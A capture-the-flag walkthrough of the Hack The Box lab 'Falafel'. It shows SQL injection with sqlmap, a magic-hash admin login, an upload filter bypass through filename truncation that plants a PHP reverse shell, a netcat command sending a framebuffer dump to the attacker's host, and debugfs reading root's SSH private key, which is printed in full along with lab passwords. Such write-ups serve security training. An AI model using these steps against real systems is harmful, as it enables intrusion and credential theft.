Today we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.
Level: Hard
Task: find user.txt & root.txt file on the victim’s machine
Since these labs are online available therefore they have static IP and its IP is 10.10.10.73 so let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.73 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time Nmap scan report for 10.10.10.73 Host is up (0.030s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA) | 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA) |_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/*.txt |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Falafel Lovers Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds
So we explored target IP through the web browser and it put up a login page shown.
Enumeration
With the information we got from robots.txt, let’s brute-force for some .txt files that might give some juicy information
root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer *
********************************************************
Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643
==================================================================
ID Response Lines Word Chars Request
==================================================================
01347: C=200 1 L 4 W 30 Ch "robots"
06064: C=200 17 L 120 W 804 Ch "cyberlaw"
Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926
Let’s check cyberlaw.txt
By reading this message, I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using an image upload feature. Moreover, there is some hint on the URL filter.
Then we could also fuzz for other usernames
root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php ******************************************************** * Wfuzz 2.3.3 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.73/login.php Total requests: 8607 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000003: C=200 102 L 657 W 7074 Ch "Aaron" 000004: C=200 102 L 657 W 7074 Ch "Aartjan" 000005: C=200 102 L 657 W 7074 Ch "Abagael" 000006: C=200 102 L 657 W 7074 Ch "Abagail" 000007: C=200 102 L 657 W 7074 Ch "Abahri" ^C Finishing pending requests... root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php ******************************************************** * Wfuzz 2.3.3 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.73/login.php Total requests: 8607 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000065: C=200 102 L 659 W 7091 Ch "Admin" 001488: C=200 102 L 659 W 7091 Ch "Chris" Total time: 37.51125 Processed Requests: 8607 Filtered Requests: 8605 Requests/sec.: 229.4511
The next thing that we can try is see if there is a SQL injection vulnerability. For test it, we can insert the following string as username:
' or 1 = 1 --
Exploiting Web Application Vulnerabilities
Then we make more efforts for SQL injection by using SQLMAP and used “Wrong identification” as a string to be passed at the time of login.
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" --dbs --batch ___ __H__ ___ ___[,]_____ ___ ___ {1.2.11.19#dev} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V |_| http://sqlmap.org [*] starting @ 14:56:59 /2019-04-02/ --snip-- available databases [2]: [*] falafel [*] information_schema
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch ___ __H__ ___ ___[(]_____ ___ ___ {1.2.11.19#dev} |_ -| . [,] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V |_| http://sqlmap.org [*] starting @ 14:59:45 /2019-04-02/ --snip-- back-end DBMS: MySQL 5 [14:59:46] [INFO] fetching tables for database: 'falafel' [14:59:46] [INFO] fetching number of tables for database 'falafel' [14:59:46] [INFO] resumed: 1 [14:59:46] [INFO] resumed: users Database: falafel [1 table] +-------+ | users | +-------+ [*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch ___ __H__ ___ ___[']_____ ___ ___ {1.2.11.19#dev} |_ -| . ['] | .'| . | |___|_ [']_|_|_|__,| _| |_|V |_| http://sqlmap.org [*] starting @ 15:01:18 /2019-04-02/ [15:01:18] [INFO] testing connection to the target URL --snip-- do you want to crack them via a dictionary-based attack? [y/N/q] N Database: falafel Table: users [2 entries] +----+--------+----------+----------------------------------+ | ID | role | username | password | +----+--------+----------+----------------------------------+ | 1 | admin | admin | 0e462096931906507119562988736854 | | 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 | +----+--------+----------+----------------------------------+ [*] ending @ 15:01:19 /2019-04-02/
As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.
As you can observe the highlighted md5 hash for the 32-bit string is same as above……………………….
With help of the following credential we login into admin dashboard and move to upload options.
1
2
|
Username: admin
Password: 240610708
|
Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown
Thereafter we renamed it as shell.php.png and again try to upload.
Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.
Spawning Shell
Let’s create a PHP payload for uploading into the web site.
As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.
Trying filenames with very long names, I noticed the web app truncates the filename saved on the disk to a maximum of 236 characters.With this logic we can create a file with a 240 chars filename with the last 8 characters set to “.php.png”. Due to the behavior of the web app, it will truncate the last four characters “.png” which will leave us with a file having a “.php” file extension.
Sample filename:
verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png
Let’s prepare a php reverse shell with a loooong,loooong file name and host it using python SimpleHTTPServer
Root@kali:~/htb/falafel# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -
Triggering the reverse shell via curl:
root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"
Netcat listener receiving the reverse shell connection:
root@kali:~/htb/falafel# nc -lvp 443 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.10.10.73. Ncat: Connection from 10.10.10.73:53576. Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 Mon00 40:59m 0.15s 0.09s -bash moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty; pty.spawn('/bin/bash')" www-data@falafel:/$
We open passwd file and notice two system username i.e. yossi and moshe.
www-data@falafel:/$ cat /etc/passwd | grep bash cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash yossi:x:1000:1000:Yossi,,,:/home/yossi:/bin/bash www-data@falafel:/$
www-data@falafel:/$ cd /var/www/html cd /var/www/html www-data@falafel:/var/www/html$ ls ls assets cyberlaw.txt images login_logic.php style.php authorized.php footer.php index.php logout.php upload.php connection.php header.php js profile.php uploads css icon.png login.php robots.txt www-data@falafel:/var/www/html$ cat connection.php cat connection.php <?php define('DB_SERVER', 'localhost:3306'); define('DB_USERNAME', 'moshe'); define('DB_PASSWORD', 'falafelIsReallyTasty'); define('DB_DATABASE', 'falafel'); $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE); // Check connection if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } ?> www-data@falafel:/var/www/html$
This is MySQL configuration file for MySQL where username is moshe and password is falafelIsReallyTasty
With help of above credential we are trying to ssh login and after making successful login we found the user.txt file from inside /home/moshe
PS C:\Users\jacco> ssh moshe@10.10.10.73 moshe@10.10.10.73's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20 $ python3 -c 'import pty;pty.spawn("/bin/bash")' setterm: terminal xterm-256color does not support --blank moshe@falafel:~$ ls user.txt moshe@falafel:~$ cat user.txt c86*****9d3
After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of the video group then for Privilege Escalation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.
Let’s have the contents of /dev/fb0 with help of cat command to capture the framebuffer raw data inside /tmp directory as scree.raw
1
2
3
4
5
|
groups
cat /dev/fb0 > /tmp/screen.raw
cd /tmp
ls
nc 10.10.14.25 5555 < screen.raw
|
So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension……………..
1
|
cat /sys/class/graphics/fb0/virtual_size
|
Now enter the following command to convert raw data into a .png image format
1
|
./iraw2png.pl 1176 885 < screen.raw > screen.png
|
Then we opened screen.png and got the following image which was showing password: MoshePlzStopHackingMe!for user Yossi.
With help of above-enumerated credential, we have made SSH login successfully and then run following command for getting SSH RSA key.
PS C:\Users\jacco> ssh yossi@10.10.10.73 yossi@10.10.10.73's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Tue Apr 2 15:16:20 2019 from 10.10.14.20 yossi@falafel:~$ groups yossi adm disk cdrom dip plugdev lpadmin sambashare yossi@falafel:~$ debugfs /dev/sda1 debugfs 1.42.13 (17-May-2015) debugfs: cat /root/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1 eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV +7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0 /YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08 kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0 GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr 5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9 BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/ k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg== -----END RSA PRIVATE KEY----- debugfs: cat /root/root.txt 23b*****fa1 debugfs: